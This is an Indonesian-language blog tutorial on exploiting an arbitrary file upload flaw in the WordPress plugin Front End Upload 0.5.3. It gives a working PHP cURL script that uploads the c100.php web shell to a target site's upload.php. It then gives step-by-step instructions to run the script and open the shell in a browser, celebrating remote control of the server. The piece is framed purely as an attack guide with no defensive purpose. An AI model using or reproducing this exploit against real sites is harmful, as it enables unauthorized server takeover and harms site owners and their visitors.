Disini penulis kembali membahas tentang plugin wordpress. Tidak jauh
berbeda dengan artikel http://blog.xcode.or.id/?p=1279, yang berbeda
hanya nama plugin, exploit dan PHP shell yang digunakan.
Exploitnya yang dibuat oleh
Adrien Thierry yang kemudian sedikit di edit untuk nama file saja dan situs.
<?php
$u=”c100.php”;
$c = curl_init(“http://situs.com/wp-content/plugins/front-end-upload/upload.php”);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘file’=>”@$u”,’name’=>”c100.php”));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
*situs.com diganti alamat web target
Simpan source code PHP tersebut dalam ekstensi PHP lalu disimpan ke
satu folder dengan PHP.exe. Disini penulis menyimpannya dengan nama
hackk2.php
Siapkan juga file c100.php yang dapat di cari di google untuk file PHP Shell ini.
Setelah itu jalankan perintah php hackk2.php
Setelah menjalankan perintah diatas maka buka browser. Jalankan perintah
http://situs.com/wp-content/plugins/front-end-upload/FEU_DESTINATION_DIR/c100.php
Hasilnya adalah sebagai berikut
Binggo, C100 telah dijalankan diserver target.
Sumber: blog.xcode.or.id
Title : Memanfaatkan celah Arbitrary File Upload pada plugin WordPress Front End Upload 0.5.3 untuk upload C100.PHP
Description : Disini penulis kembali membahas tentang plugin wordpress. Tidak jauh berbeda dengan artikel http://blog.xcode.or.id/?p=1279, yang berbeda ...